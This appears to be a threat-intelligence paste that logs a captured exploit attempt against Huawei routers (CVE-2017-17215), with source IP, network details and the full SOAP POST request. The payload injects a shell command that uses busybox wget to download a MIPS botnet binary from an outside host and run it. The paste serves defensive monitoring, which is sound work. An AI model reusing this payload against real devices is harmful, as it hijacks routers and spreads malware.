Advertisement
internetweather

Huawei RCE exploit attempt (CVE-2017-17215)

Mar 27th, 2019
473
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.96 KB | None | 0 0
  1. Source IP 185.244.25.151
  2. Netblock 185.244.25.0/24
  3. Netblock Description " KV Solutions B.V."
  4. Country Netherlands
  5. ASN AS60144
  6. ASN Name " THREE-W-INFRA-AS"
  7. User Agent python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.9.1.el6.x86_64
  8. Method POST
  9. URI /ctrlt/DeviceUpgrade_1
  10. POST Data "<?xml version=\1.0\"" ?>\n
  11. <s:Envelope xmlns:s=\""http://schemas.xmlsoap.org/soap/envelope/\"" s:encodingStyle=\""http://schemas.xmlsoap.org/soap/encoding/\"">\n
  12. <s:Body><u:Upgrade xmlns:u=\""urn:schemas-upnp-org:service:WANPPPConnection:1\"">\n
  13. <NewStatusURL>$(busybox wget -g 185.244.25.207 -l /tmp/bin ry -r /lmaoWTF/loligang.mips; /bin/busybox chmod 777 * /tmp/bin ry; /tmp/bin ry huawei)</NewStatusURL>\n
  14. <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n
  15. </u:Upgrade>\n
  16. </s:Body>\n
  17. </s:Envelope>"
  18. Port Targeted 37215/tcp (Huawei Service Port)
  19. Recon Scan Type ZMap
  20. Date First Seen 2019-03-27T23:22:28Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement